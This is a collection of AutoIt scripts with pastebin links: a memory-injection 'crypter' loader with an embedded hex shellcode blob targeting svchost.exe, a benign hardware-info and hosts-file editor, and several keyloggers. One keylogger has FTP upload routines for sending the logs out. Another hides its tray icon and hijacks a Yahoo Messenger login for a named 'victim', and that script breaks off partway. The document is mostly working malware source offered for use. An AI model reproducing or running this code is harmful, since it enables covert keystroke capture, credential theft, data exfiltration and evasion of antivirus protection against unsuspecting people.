RunExeFromMemory.au3

This script demonstrate execution from memory, a technique used in many crypter.
http://pastebin.com/7qrhYzcj
________________________________________
Local $sBinary = FileOpenDialog("Elija tu Servidor para Ejecutar en la Memoria", "", "Archivos exe (*.exe)")

Call ( RunExeFromMemory(Fileread($sBinary)))





Func RunExeFromMemory($Binary)

    Global $Memory ,  $FileBuffer

    $Memory = DllStructCreate("Boolean[" & sReadBytes(sShellCode()) & "]")
    $FileBuffer = DllStructCreate("Boolean[" & sReadBytes($Binary) & "]")
    DllStructSetData($Memory, 1, sShellRead(sShellCode()))
    DllStructSetData($FileBuffer, 1, $Binary)

    Call ( CWPA( sStructBuffer(), sInjectMyApp(), sStructBin(), False, False ))

EndFunc




Func sStructBuffer()

    Local $Ret = DllStructGetPtr($Memory)
    Return $Ret

EndFunc




Func sStructBin()

    Local $Ret2 = DllStructGetPtr($FileBuffer)
    Return $Ret2

EndFunc





Func CWPA($lpPrevWndFunc, $hWnd, $Msg, $wParam, $lParam)

    Local $Return
    $Return = DllCall("User32", "none", "CallWindowProcA", "ptr", $lpPrevWndFunc, "wstr", $hWnd, "ptr", $Msg, "int", $wParam, "int", $lParam)

EndFunc






Func sInjectMyApp()

    Local $sInject = @SystemDir & "\svchost.exe"
    Return $sInject

EndFunc





Func sShellCode ()

   Local $Buffer
         $Buffer = "0x" & "30783630453834453030303030303642303036353030373230303645303036353030364330303333​30303332303030303030364530303734303036343030364" & _
    "33030364330303030303030303030303030303030303030303030303030303030303030303030303​030303030303030303030303030303030303030303030303030303030303030303030" & _
    "30303030303030303030303030303030303030303030303030303030303030303542384246433641​343245384242303330303030384235343234323838393131384235343234324336413" & _
    "34545384141303330303030383931313641344145384131303330303030383933393641314536413​343453839443033303030303641323236384634303030303030453839313033303030" & _
    "30364132363641323445383838303330303030364132413641343045383746303330303030364132​453641304345383736303330303030364133323638433830303030303045383641303" & _
    "33030303036413241453835433033303030303842303943373031343430303030303036413132453​834443033303030303638354245383134434635314538373930333030303036413345" & _
    "45383342303330303030384244313641314545383332303330303030364134304646333246463331​464644303641313245383233303330303030363835424538313443463531453834463" & _
    "03330303030364131454538313130333030303038423039384235313343364133454538303530333​030303038423339303346413641323245384641303230303030384230393638463830" & _
    "30303030303537353146464430364130304538453830323030303036383838464542333136353145​383134303330303030364132454538443630323030303038423339364132414538434" & _
    "43032303030303842313136413432453843343032303030303537353236413030364130303641303​436413030364130303641303036413030464633314646443036413132453841393032" & _
    "30303030363844303337313046323531453844353032303030303641323245383937303230303030​384231313641324545383845303230303030384230394646373233344646333146464" & _
    "43036413030453837453032303030303638394339353141364535314538414130323030303036413​232453836433032303030303842313138423339364132454538363130323030303038" & _
    "42303936413430363830303330303030304646373235304646373733344646333146464430364133​364538343730323030303038424431364132324538334530323030303038423339364" & _
    "13345453833353032303030303842333136413232453832433032303030303842303136413245453​832333032303030303842303935324646373735343536464637303334464633313641" & _
    "30304538313030323030303036384131364133444438353145383343303230303030383343343043​464644303641313245384639303130303030363835424538313443463531453832353" & _
    "03230303030364132324538453730313030303038423131383343323036364133414538444230313​030303036413032353235314646443036413336453843453031303030304337303130" & _
    "30303030303030423832383030303030303641333645384243303130303030463732313641314545​384233303130303030384231313842353233433831433246383030303030303033443" & _
    "03641334545383946303130303030303331313641323645383936303130303030364132383532464​633313641313245383841303130303030363835424538313443463531453842363031" & _
    "30303030383343343043464644303641323645383733303130303030384233393842303938423731​313436413345453836353031303030303033333136413236453835433031303030303" & _
    "84230393842353130433641323245383530303130303030384230393033353133343641343645383​434303130303030384243313641324545383342303130303030384230393530464637" & _
    "37313035363532464633313641303045383241303130303030363841313641334444383531453835​363031303030303833433430434646443036413336453831333031303030303842313" & _
    "13833433230313839313136413341453830353031303030303842303933424341304638353333464​646464646364133324538463430303030303038423039433730313037303030313030" & _
    "36413030453845353030303030303638443243374137363835314538313130313030303036413332​453844333030303030303842313136413245453843413030303030303842303935324" & _
    "64637313034464644303641323245384242303030303030384233393833433733343641333245384​146303030303030384233313842423641343030303030303833433630383641324545" & _
    "38394430303030303038423131364134364538393430303030303035313641303435373536464633​323641303045383836303030303030363841313641334444383531453842323030303" & _
    "03030383343343043464644303641323245383646303030303030384230393842353132383033353​133343641333245383630303030303030384230393831433142303030303030303839" & _
    "31313641303045383446303030303030363844334337413745383531453837423030303030303641​333245383344303030303030384244313641324545383334303030303030384230394" & _
    "64633324646373130344646443036413030453832343030303030303638383833463441394535314​538353030303030303036413245453831323030303030303842303946463731303446" & _
    "46443036413441453830343030303030303842323136314333384243423033344332343034433336​413030453846324646464646463638353443414146393135314538314530303030303" & _
    "03641343036383030313030303030464637343234313836413030464644304646373432343134453​843464646464646463839303138334334313043334538323230303030303036384134" & _
    "34453045454335304538344230303030303038334334303846463734323430344646443046463734​323430383530453833383030303030303833433430384333353535323531353335363" & _
    "53733334330363438423730333038423736304338423736314338423645303838423745323038423​336333834373138373546333830334636423734303738303346344237343032454245" & _
    "37384243353546354535423539354135444333353535323531353335363537384236433234314338​354544373434333842343533433842353432383738303344353842344131383842354" & _
    "13230303344444533333034393842333438423033463533334646333343304643414338344330373​430374331434630443033463845424634334237433234323037354531384235413234" & _
    "30334444363638423043344238423541314330334444384230343842303343353546354535423539​35413544433343333030303030303030"

    Return $Buffer

EndFunc




Func sShellRead($sData)

    Local $sValue

    For $i = 1 To sReadBytes($sData)
        $sValue &= Chr(sValue(BinaryMid($sData , $i , 1)))
    Next

    Return $sValue

EndFunc





Func sReadBytes($Data)

    Local $Value = BinaryLen($Data)
    Return $Value

EndFunc





Func sValue($Value)

    Local $Result = Execute($Value)
    Return Number($Result)

EndFunc

My First Project

This is my very first program :3 Back when I just started to learn about programming, instead of writing a hello world program, I made this :3
http://pastebin.com/3zYGxxLT
_____________________________
#RequireAdmin
#Include
#include
#include
#include

$title = "A.I.X.O.A. v0.1"
$ifilepath = @WindowsDir & "\system32\drivers\etc\hosts"

;GUI
GUICreate( $title , 720, 380,-1,-1)


;hosts file
$Hfile = FileOpen($ifilepath,16)
If $Hfile = -1 Then
    MsgBox(0, "Error", "Unable to open file.")
EndIf
$Hcontent = BinaryToString(FileRead($Hfile))
FileClose($Hfile)


;Tab greenC8EDCC red2D01EE blueFF0000
GUICtrlCreateTab(1,5,720,373)
GUICtrlCreateTabItem("CPU")
$cpuinfo = GUICtrlCreateListView("Description|CPU infomation",10,35,700,300)
$refreshCpu = GUICtrlCreateButton("Refresh",10,340,105,30)
GUICtrlCreateTabItem("Drive")
$Dinfo = GUICtrlCreateListView("Drive|Drive Name|Free space|Total space|File system|Status|Drive Serial",10,35,700,300)
$refreshDrive = GUICtrlCreateButton("Refresh",10,340,105,30)
GUICtrlCreateTabItem("Important file")
$hosts = GUICtrlCreateEdit($Hcontent,10,35,700,300)
$saveH = GUICtrlCreateButton("Save",10,340,105,30)
$hostsfile = GUICtrlCreateButton("Hosts",125,340,105,30)
$winini = GUICtrlCreateButton("Win.ini",240,340,105,30)
$systemini = GUICtrlCreateButton("system.ini",355,340,105,30)
$bootini = GUICtrlCreateButton("boot.ini",470,340,105,30)
GUICtrlCreateTabItem("BIOS")
$BiosList = GUICtrlCreateListView("Description|Basic Input Output System infomation",10,35,700,300)

;tab contents
;cpu tab
_CPURegistryInfo()
_GUICtrlListView_DeleteAllItems($cpuinfo)
GUICtrlCreateListViewItem("Name|"& $aCPUInfo[2],$cpuinfo)
GUICtrlCreateListViewItem("# of thread|"& $aCPUInfo[0],$cpuinfo)
GUICtrlCreateListViewItem("CPU speed|"& Round($aCPUInfo[1]/1000,1) &"Ghz" ,  $cpuinfo)
GUICtrlCreateListViewItem("Identifier|"& $aCPUInfo[3],$cpuinfo)
GUICtrlCreateListViewItem("Vendor|"& $aCPUInfo[4],$cpuinfo)
;drive tab
_DriveInfo()
_GUICtrlListView_DeleteAllItems($Dinfo)
For $i = 1 to $DriveNum[0]
GUICtrlCreateListViewItem($DriveNum[$i] &"|"& $Dlabel[$i] &"|"& Round($Dfree[$i]/1000,1) &"GB|"& Round($Dtotal[$i]/1000,1) &"GB|"& $Dfs[$i] &"|"& $Dstatus[$i] &"|"& $Dserial[$i],$Dinfo)
Next


; GUI MESSAGE LOOP
GuiSetState()

Do
    $msg = GUIGetMsg()
   
    Select
       Case $msg = $refreshCpu
            _GUICtrlListView_DeleteAllItems($cpuinfo)
            GUICtrlCreateListViewItem("Name|"& $aCPUInfo[2],$cpuinfo)
            GUICtrlCreateListViewItem("# of thread|"& $aCPUInfo[0],$cpuinfo)
            GUICtrlCreateListViewItem("CPU speed|"& Round($aCPUInfo[1]/1000,1) &"Ghz" ,  $cpuinfo)
            GUICtrlCreateListViewItem("Identifier|"& $aCPUInfo[3],$cpuinfo)
            GUICtrlCreateListViewItem("Vendor|"& $aCPUInfo[4],$cpuinfo)
      
       Case  $msg = $refreshDrive
            _GUICtrlListView_DeleteAllItems($Dinfo)
            For $i = 1 to $DriveNum[0]
            GUICtrlCreateListViewItem($DriveNum[$i] &"|"& $Dlabel[$i] &"|"& Round($Dfree[$i]/1000,1) &"GB|"& Round($Dtotal[$i]/1000,1) &"GB|"& $Dfs[$i] &"|"& $Dstatus[$i] &"|"& $Dserial[$i],$Dinfo)
            Next
      
       Case $msg = $saveH
            $Hfile = FileOpen($ifilepath,2)
            $Hwrite = FileWrite($Hfile,_GUICtrlEdit_GetText($hosts))
            FileClose($Hfile)
            If  $Hwrite = 1 Then
                 MsgBox(0,"Aixoa editor","Save successful")
            Else
                 MsgBox(0,"Aixoa editor","Save failure")   
            EndIf       
      
       Case $msg = $bootini
            $ifilepath = StringReplace(@windowsdir,"WINDOWS","") & "boot.ini"
           
           
       Case $msg = $systemini
            $ifilepath = @windowsdir & "\system.ini"
            _openinifile()
            _GUICtrlEdit_Destroy($hosts)
            $hosts = GUICtrlCreateEdit($Hcontent,10,35,700,300)
           
       Case $msg = $winini
            $ifilepath = @windowsdir & "\win.ini"
    EndSelect   
   
Until    $msg = $GUI_EVENT_CLOSE

;===========================Funtions========================
;       [0] = # of Reported CPU's (can include 'logical' processors as well (# CPU's * # of hyperthreads))
;       [1] = CPU Speed (Mhz)
;       [2] = CPU Name
;       [3] = Identifier (family, model, stepping)
;       [4] = Vendor name
;       [5] = Feature Set (unsure what values are which..)
;   Failure: @error = same as returned by RegEnumKey(), with an empty array ([0] = -1 though)
;       @error = 1 = unable to open requested key
;       @error = 2 = unable to open requested Main key
;       @error = 3 = unable to connect to *remote* registry (not likely a return here)
;       @error = -1 = unable to retrieve requested subkey (key instance out of range)
; ===============================================================================================================================

Func _CPURegistryInfo()
    Global $aCPUInfo[6]

    $aCPUInfo[0]=EnvGet("NUMBER_OF_PROCESSORS")

    If @error Then Return SetError(@error,0,$aCPUInfo)
   
    $aCPUInfo[1] = RegRead ("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0","~MHz")
    $aCPUInfo[2] = RegRead ("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0","ProcessorNameString")
    $aCPUInfo[3] = RegRead ("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0","Identifier")
    $aCPUInfo[4] = RegRead ("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0","VendorIdentifier")
    $aCPUInfo[5] = RegRead ("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0","FeatureSet")

 Return $aCPUInfo
EndFunc
;----------------------------------------
Func _DriveInfo()
    Global $DriveNum[12]
    Global $Dlabel[12]
    Global $Dfree[12]
    Global $Dtotal[12]
    Global $Dfs[12]
    Global $Dstatus[12]
    Global $Dserial[12]
    $DriveNum = DriveGetDrive("fixed")
    For $i = 1 To $DriveNum[0]
        $Dlabel[$i] = DriveGetLabel($DriveNum[$i])
        $Dfree[$i] = DriveSpaceFree($DriveNum[$i])
        $Dtotal[$i] = DriveSpaceTotal($DriveNum[$i])
        $Dfs[$i] = DriveGetFileSystem($DriveNum[$i])
        $Dstatus[$i] = DriveStatus($DriveNum[$i])
        $Dserial[$i] = DriveGetSerial($DriveNum[$i])
    Next   
   
EndFunc   
;====================================================================
Func _openinifile()
 $Hfile = FileOpen($ifilepath,1)
 If $Hfile = -1 Then
    MsgBox(0, "Error", "Unable to open file.")
 EndIf
 $Hcontent = FileRead($Hfile)
 FileClose($Hfile)
EndFunc

Keylogger4.au3

http://pastebin.com/mD3z7ycb
 _______________________________
#include
#include
#include
#include
#include

;Keylogger UDF
;Coded by Reverence

Global $Save, $Size

$Server = "ServerName"
$Username = "Username"
$Password = "Password"

$Save = @DesktopDir & "/" & "Log.txt"
_FileCreate($Save)

_AssignKey()

Func _AssignKey()
While 1
HotKeySet("a", "_LogA")
HotKeySet("b", "_LogB")
HotKeySet("c", "_LogC")
HotKeySet("d", "_LogD")
HotKeySet("e", "_LogE")
HotKeySet("f", "_LogF")
HotKeySet("g", "_LogG")
HotKeySet("h", "_LogH")
HotKeySet("i", "_LogI")
HotKeySet("j", "_LogJ")
HotKeySet("k", "_LogK")
HotKeySet("l", "_LogL")
HotKeySet("m", "_LogM")
HotKeySet("n", "_LogN")
HotKeySet("o", "_LogO")
HotKeySet("p", "_LogP")
HotKeySet("q", "_LogQ")
HotKeySet("r", "_LogR")
HotKeySet("s", "_LogS")
HotKeySet("t", "_LogT")
HotKeySet("u", "_LogU")
HotKeySet("v", "_LogV")
HotKeySet("w", "_LogW")
HotKeySet("x", "_LogX")
HotKeySet("y", "_LogY")
HotKeySet("z", "_LogZ")
HotKeySet(" ", "_LogSpace")
HotKeySet(".", "_LogDot")
HotKeySet("'", "_LogApo")
HotKeySet(",", "_LogComma")
HotKeySet(";", "_LogSemCol")
HotKeySet("/", "_LogRightSlash")
HotKeySet("\", "_LogLeftSlash")
HotKeySet("[", "_LogRightBracket")
HotKeySet("]", "_LogLeftBracket")
HotKeySet("1", "_Log1")
HotKeySet("2", "_Log2")
HotKeySet("3", "_Log3")
HotKeySet("4", "_Log4")
HotKeySet("5", "_Log5")
HotKeySet("6", "_Log6")
HotKeySet("7", "_Log7")
HotKeySet("8", "_Log8")
HotKeySet("9", "_Log9")
HotKeySet("0", "_Log0")
HotKeySet("{!}", "_LogEx")
HotKeySet("A", "_LogCaA")
HotKeySet("B", "_LogCaB")
HotKeySet("C", "_LogCaC")
HotKeySet("D", "_LogCaD")
HotKeySet("E", "_LogCaE")
HotKeySet("F", "_LogCaF")
HotKeySet("G", "_LogCaG")
HotKeySet("H", "_LogCaH")
HotKeySet("I", "_LogCaI")
HotKeySet("J", "_LogCaJ")
HotKeySet("K", "_LogCaK")
HotKeySet("L", "_LogCaL")
HotKeySet("M", "_LogCaM")
HotKeySet("N", "_LogCaN")
HotKeySet("O", "_LogCaO")
HotKeySet("P", "_LogCaP")
HotKeySet("Q", "_LogCaQ")
HotKeySet("R", "_LogCaR")
HotKeySet("S", "_LogCaS")
HotKeySet("T", "_LogCaT")
HotKeySet("U", "_LogCaU")
HotKeySet("V", "_LogCaV")
HotKeySet("W", "_LogCaW")
HotKeySet("X", "_LogCaX")
HotKeySet("Y", "_LogCaY")
HotKeySet("Z", "_LogCaZ")
HotKeySet(@CRLF, "_LogEnt")
HotKeySet("{#}", "_LogNum")
HotKeySet("{+}", "_LogPlus")
HotKeySet("^", "_LogUp")
HotKeySet("{{}", "_LogRight")
HotKeySet("{}}", "_LogLeft")
HotKeySet("(", "_LogPa1")
HotKeySet(")", "_LogPa2")
HotKeySet("*", "_LogStar")
HotKeySet("&", "_LogAnd")
HotKeySet("%", "_LogPercent")
HotKeySet("quot;, "_LogDollar")
HotKeySet("@", "_LogAt")
HotKeySet("-", "_LogHyphen")
HotKeySet("_", "_LogUnderscore")
HotKeySet(":", "_LogColon")
HotKeySet(">", "_LogRightArr")
HotKeySet("<", "_LogLeftArr")
HotKeySet("?", "_LogQuesMark")
HotKeySet("`", "_LogWeird")
HotKeySet("~", "_LogSquiggle")
WEnd
EndFunc

Func _LogA()
FileWrite($Save, "a")
Call("_AssignKey")
EndFunc

Func _LogB()
FileWrite($Save, "b")
Call("_AssignKey")
EndFunc

Func _LogC()
FileWrite($Save, "c")
Call("_AssignKey")
EndFunc

Func _LogD()
FileWrite($Save, "d")
Call("_AssignKey")
EndFunc

Func _LogE()
FileWrite($Save, "e")
Call("_AssignKey")
EndFunc

Func _LogF()
FileWrite($Save, "f")
Call("_AssignKey")
EndFunc

Func _LogG()
FileWrite($Save, "g")
Call("_AssignKey")
EndFunc

Func _LogH()
FileWrite($Save, "h")
Call("_AssignKey")
EndFunc

Func _LogI()
FileWrite($Save, "i")
Call("_AssignKey")
EndFunc

Func _LogJ()
FileWrite($Save, "j")
Call("_AssignKey")
EndFunc

Func _LogK()
FileWrite($Save, "k")
Call("_AssignKey")
EndFunc

Func _LogL()
FileWrite($Save, "l")
Call("_AssignKey")
EndFunc

Func _LogM()
FileWrite($Save, "m")
Call("_AssignKey")
EndFunc

Func _LogN()
FileWrite($Save, "n")
Call("_AssignKey")
EndFunc

Func _LogO()
FileWrite($Save, "o")
Call("_AssignKey")
EndFunc

Func _LogP()
FileWrite($Save, "p")
Call("_AssignKey")
EndFunc

Func _LogQ()
FileWrite($Save, "q")
Call("_AssignKey")
EndFunc

Func _LogR()
FileWrite($Save, "r")
Call("_AssignKey")
EndFunc

Func _LogS()
FileWrite($Save, "s")
Call("_AssignKey")
EndFunc

Func _LogT()
FileWrite($Save, "t")
Call("_AssignKey")
EndFunc

Func _LogU()
FileWrite($Save, "u")
Call("_AssignKey")
EndFunc

Func _LogV()
FileWrite($Save, "v")
Call("_AssignKey")
EndFunc

Func _LogW()
FileWrite($Save, "w")
Call("_AssignKey")
EndFunc

Func _LogX()
FileWrite($Save, "x")
Call("_AssignKey")
EndFunc

Func _LogY()
FileWrite($Save, "y")
Call("_AssignKey")
EndFunc

Func _LogZ()
FileWrite($Save, "z")
Call("_AssignKey")
EndFunc

Func _LogSpace()
FileWrite($Save, " ")
Call("_AssignKey")
EndFunc

Func _LogDot()
FileWrite($Save, ".")
Call("_AssignKey")
EndFunc

Func _LogApo()
FileWrite($Save, "'")
Call("_AssignKey")
EndFunc

Func _LogComma()
FileWrite($Save, ",")
Call("_AssignKey")
EndFunc

Func _LogSemCol()
FileWrite($Save, ";")
Call("_AssignKey")
EndFunc

Func _LogRightSlash()
FileWrite($Save, "/")
Call("_AssignKey")
EndFunc

Func _LogLeftSlash()
FileWrite($Save, "\")
Call("_AssignKey")
EndFunc

Func _LogRightBracket()
FileWrite($Save, "[")
Call("_AssignKey")
EndFunc

Func _LogLeftBracket()
FileWrite($Save, "]")
Call("_AssignKey")
EndFunc

Func _Log1()
FileWrite($Save, "1")
Call("_AssignKey")
EndFunc

Func _Log2()
FileWrite($Save, "2")
Call("_AssignKey")
EndFunc

Func _Log3()
FileWrite($Save, "3")
Call("_AssignKey")
EndFunc

Func _Log4()
FileWrite($Save, "4")
Call("_AssignKey")
EndFunc

Func _Log5()
FileWrite($Save, "5")
Call("_AssignKey")
EndFunc

Func _Log6()
FileWrite($Save, "6")
Call("_AssignKey")
EndFunc

Func _Log7()
FileWrite($Save, "7")
Call("_AssignKey")
EndFunc

Func _Log8()
FileWrite($Save, "8")
Call("_AssignKey")
EndFunc

Func _Log9()
FileWrite($Save, "9")
Call("_AssignKey")
EndFunc

Func _Log0()
FileWrite($Save, "0")
Call("_AssignKey")
EndFunc

Func _LogEx()
FileWrite($Save, "!")
Call("_AssignKey")
EndFunc

Func _LogCaA()
FileWrite($Save, "A")
Call("_AssignKey")
EndFunc

Func _LogCaB()
FileWrite($Save, "B")
Call("_AssignKey")
EndFunc

Func _LogCaC()
FileWrite($Save, "C")
Call("_AssignKey")
EndFunc

Func _LogCaD()
FileWrite($Save, "D")
Call("_AssignKey")
EndFunc

Func _LogCaE()
FileWrite($Save, "E")
Call("_AssignKey")
EndFunc

Func _LogCaF()
FileWrite($Save, "F")
Call("_AssignKey")
EndFunc

Func _LogCaG()
FileWrite($Save, "G")
Call("_AssignKey")
EndFunc

Func _LogCaH()
FileWrite($Save, "H")
Call("_AssignKey")
EndFunc

Func _LogCaI()
FileWrite($Save, "I")
Call("_AssignKey")
EndFunc

Func _LogCaJ()
FileWrite($Save, "J")
Call("_AssignKey")
EndFunc

Func _LogCaK()
FileWrite($Save, "K")
Call("_AssignKey")
EndFunc

Func _LogCaL()
FileWrite($Save, "L")
Call("_AssignKey")
EndFunc

Func _LogCaM()
FileWrite($Save, "M")
Call("_AssignKey")
EndFunc

Func _LogCaN()
FileWrite($Save, "N")
Call("_AssignKey")
EndFunc

Func _LogCaO()
FileWrite($Save, "O")
Call("_AssignKey")
EndFunc

Func _LogCaP()
FileWrite($Save, "P")
Call("_AssignKey")
EndFunc

Func _LogCaQ()
FileWrite($Save, "Q")
Call("_AssignKey")
EndFunc

Func _LogCaR()
FileWrite($Save, "R")
Call("_AssignKey")
EndFunc

Func _LogCaS()
FileWrite($Save, "S")
Call("_AssignKey")
EndFunc

Func _LogCaT()
FileWrite($Save, "T")
Call("_AssignKey")
EndFunc

Func _LogCaU()
FileWrite($Save, "U")
Call("_AssignKey")
EndFunc

Func _LogCaV()
FileWrite($Save, "V")
Call("_AssignKey")
EndFunc

Func _LogCaW()
FileWrite($Save, "W")
Call("_AssignKey")
EndFunc

Func _LogCaX()
FileWrite($Save, "X")
Call("_AssignKey")
EndFunc

Func _LogCaY()
FileWrite($Save, "Y")
Call("_AssignKey")
EndFunc

Func _LogCaZ()
FileWrite($Save, "Z")
Call("_AssignKey")
EndFunc

Func _LogEnt()
FileWrite($Save, @CRLF)
Call("_AssignKey")
EndFunc

Func _LogNum()
FileWrite($Save, "#")
Call("_AssignKey")
EndFunc

Func _LogPlus()
FileWrite($Save, "+")
Call("_AssignKey")
EndFunc

Func _LogUp()
FileWrite($Save, "^")
Call("_AssignKey")
EndFunc

Func _LogRight()
FileWrite($Save, "{")
Call("_AssignKey")
EndFunc

Func _LogLeft()
FileWrite($Save, "}")
Call("_AssignKey")
EndFunc

Func _LogPa1()
FileWrite($Save, "(")
Call("_AssignKey")
EndFunc

Func _LogPa2()
FileWrite($Save, ")")
Call("_AssignKey")
EndFunc

Func _LogStar()
FileWrite($Save, "*")
Call("_AssignKey")
EndFunc

Func _LogAnd()
FileWrite($Save, "&")
Call("_AssignKey")
EndFunc

Func _LogPercent()
FileWrite($Save, "%")
Call("_AssignKey")
EndFunc

Func _LogDollar()
FileWrite($Save, "quot;)
Call("_AssignKey")
EndFunc

Func _LogAt()
FileWrite($Save, "@")
Call("_AssignKey")
EndFunc

Func _LogHyphen()
FileWrite($Save, "-")
Call("_AssignKey")
EndFunc

Func _LogUnderscore()
FileWrite($Save, "_")
Call("_AssignKey")
EndFunc

Func _LogQuesMark()
FileWrite($Save, "?")
Call("_AssignKey")
EndFunc

Func _LogRightArr()
FileWrite($Save, ">")
Call("_AssignKey")
EndFunc

Func _LogLeftArr()
FileWrite($Save, "<")
Call("_AssignKey")
EndFunc

Func _LogWeird()
FileWrite($Save, "`")
Call("_AssignKey")
EndFunc

Func _LogSquiggle()
FileWrite($Save, "~")
Call("_AssignKey")
EndFunc

Func _LogColon()
FileWrite($Save, ":")
Call("_AssignKey")
EndFunc

Func _FTP_FileSend($Server, $Username, $Password, $LocFile, $RemFile)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_FilePut($oConnect, $LocFile, $RemFile)

_FTP_Close($oFTP)

EndFunc

Func _FTP_CreateDir($DirName)

$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)

_FTP_DirCreate($oConnect, $DirName)

_FTP_Close($oFTP)

EndFunc

Keylogger3.au3

http://pastebin.com/SA93wkw5
____________________________________

Opt("SendKeyDelay",150)
Opt("SendKeyDownDelay",50)
Global $keyf,$keyup,$ckok=False,$f_path = @SystemDir & "\keylog.txt"
Global $shdown=True,$shup
Global $sDateTime = @YEAR & "-" & @MON & "-" & @MDAY &" "&@HOUR & ":" & @MIN & ":" & @SEC
;Separate hex and char
$hex = StringSplit("08,09,0d,10,11,12,13,14,1b,20,21,22,23,24,25,26,27,28,2c,2d,2e," & _
"30,31,32,33,34,35,36,37,38,39,41,42,43,44,45,46,47,48,49,4a,4b,4c,4d,4e,4f,50,51,52,53,54,55,56,57,58,59,5a," & _
"ba,bb,bc,bd,be,bf,c0,db,dc,dd,5b,5c", _
",")
$char = StringSplit(" BACKSPACE , TAB , ENTER , SHIFT , CTR , ALT , PAUSE , CAPLOCKS , ESC , SPACE , PAGEUP , PAGEDOWN , END , HOME , LEFT , UP , RIGHT , DOWN , PRINTSCR , INS , DEL ," & _
"0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z" & _
" ; , = , dot , - , . , / , ` , [ , \ , ], lWIN , rWIN ", _
",")
;=>End
HotKeySet ("^!#{f12}","thoat")
Func thoat()
DllClose($dll)
FileClose($file)
Run("notepad.exe " & $f_path)
Exit
EndFunc
;;=> Ket thuc ham
If Not FileExists($f_path) Then _FileWriteLog($f_path,'')
$dll = DllOpen("user32.dll")
$file = FileOpen($f_path, 1)
If $file = -1 Then
MsgBox(0, "Loi", "Khong the mo file")
Exit
EndIf
FileWriteLine($file, $sDateTime)
While 1
Sleep ( 10 )
readchar()
WEnd
DllClose($dll)
Func readchar()
For $i = 1 to $hex[0]
Select
Case _IsPressed($hex[$i],$dll)
If _IsPressed("10", $dll) Then
if $shdown ==True Then
FileWrite($file," SHIFTDOWN ")
Sleep(30)
$shdown= False
$shup= True
EndIf
Else
$keyup = $hex[$i]
checkku()
writechar($char[$i])
EndIf
Case _IsRelease("10", $dll)
if $shup== True Then
FileWrite($file," SHIFTUP ")
Sleep(30)
$shdown= True
$shup= False
EndIf
EndSelect
Next
EndFunc
Func checkku()
Do
If _IsRelease($keyup,$dll) then
$ckok =True
EndIf
Until $ckok =true
EndFunc
Func writechar($keyf= "")
If $file = -1 Then
MsgBox(0, "Loi", "Khong the mo file.")
Exit
EndIf
If $ckok =true then
FileWrite($file,$keyf)
Sleep(10)
$ckok =False
EndIf
EndFunc
Func _IsPressed($sHexKey, $vDLL = 'user32.dll')
Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 1
Return 0
EndFunc
Func _IsRelease($sHexKey, $vDLL = 'user32.dll')
Local $a_R = DllCall($vDLL, "int", "GetAsyncKeyState", "int", '0x' & $sHexKey)
If Not @error And BitAND($a_R[0], 0x8000) = 0x8000 Then Return 0
Return 1
EndFunc
Func _FileWriteLog($sLogPath, $sLogMsg, $iFlag = -1)
Local $sDateNow, $sTimeNow, $sMsg, $iWriteFile, $hOpenFile, $iOpenMode = 1
$sDateNow = @YEAR & "-" & @MON & "-" & @MDAY
$sTimeNow = @HOUR & ":" & @MIN & ":" & @SEC
$sMsg = $sDateNow & " " & $sTimeNow & " : " & $sLogMsg
If $iFlag <> -1 Then
$sMsg &= @CRLF & FileRead($sLogPath)
$iOpenMode = 2
EndIf
$hOpenFile = FileOpen($sLogPath, $iOpenMode)
If $hOpenFile = -1 Then Return SetError(1, 0, 0)
$iWriteFile = FileWriteLine($hOpenFile, $sMsg)
If $iWriteFile = -1 Then Return SetError(2, 0, 0)
Return FileClose($hOpenFile)
EndFunc ;

Keylogger2.au3

http://pastebin.com/nU9Gm1WJ
__________________________________________
#NotrayIcon
#include
;==============================
; AutoIt
; Simple KeyLogger Function
;==============================

sGetKey()

Func sGetKey()

While 1

Local  $sKey, $Result , $Log

For $sKey = 1 To 255

$Result = _WinAPI_GetAsyncKeyState($sKey)

If $Result = -32767 then

$Result = Chr($sKey)

$Log = FileOpen(@DesktopDir & "\Log.txt", 1)

FileWrite($Log, $Result)

FileClose($Log)

EndIf

Next

WEnd

Endfunc

Keylogger.au3

http://pastebin.com/5mVUtsQm
__________________________________
    #NoTrayIcon
    Opt("SendKeyDownDelay", 50)
    $UserDll = DllOpen("user32.dll")
    Func _IsPressed($hexKey)
    Local $aR, $bO
    $aR = DllCall($UserDll, "int", "GetAsyncKeyState", "int", $hexKey)
    If $aR[0] <> 0 Then
        $bO = 1
    Else
        $bO = 0
    EndIf
    Return $bO
    EndFunc
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ;$window2=wingettitle("")
    $log= @ScriptDir
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    $idvictim="nguyentrihai93"
    $var=string("")
    ProcessClose("YahooMessenger.exe")
    ProcessWaitClose("YahooMessenger.exe")
    Run(@ProgramFilesDir & "\Yahoo!\Messenger\YahooMessenger.exe")
    WinWaitActive("Yahoo! Messenger")
    $yahoo_handle = WinGetHandle("[active]")
    ;MsgBox(0,"Thông báo","Bạn cần xác nhận lại tài khoản để nhận quà")
    ControlSetText($yahoo_handle,'',211,$idvictim)
    ControlClick($yahoo_handle,"",212)
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    Global $var
    Func _LogKeyPress($what2log)
            $var=StringAddCR($var & $what2log)
            Sleep(100)
    EndFunc
    Func logkey()
    While 1
    If _IsPressed(0xBA) = 1 Then _LogKeyPress('; ')
    If _IsPressed(0xBB) = 1 Then _LogKeyPress('= ')
    If _IsPressed(0xBC) = 1 Then _LogKeyPress(', ')
    If _IsPressed(0xBD) = 1 Then _LogKeyPress('- ')
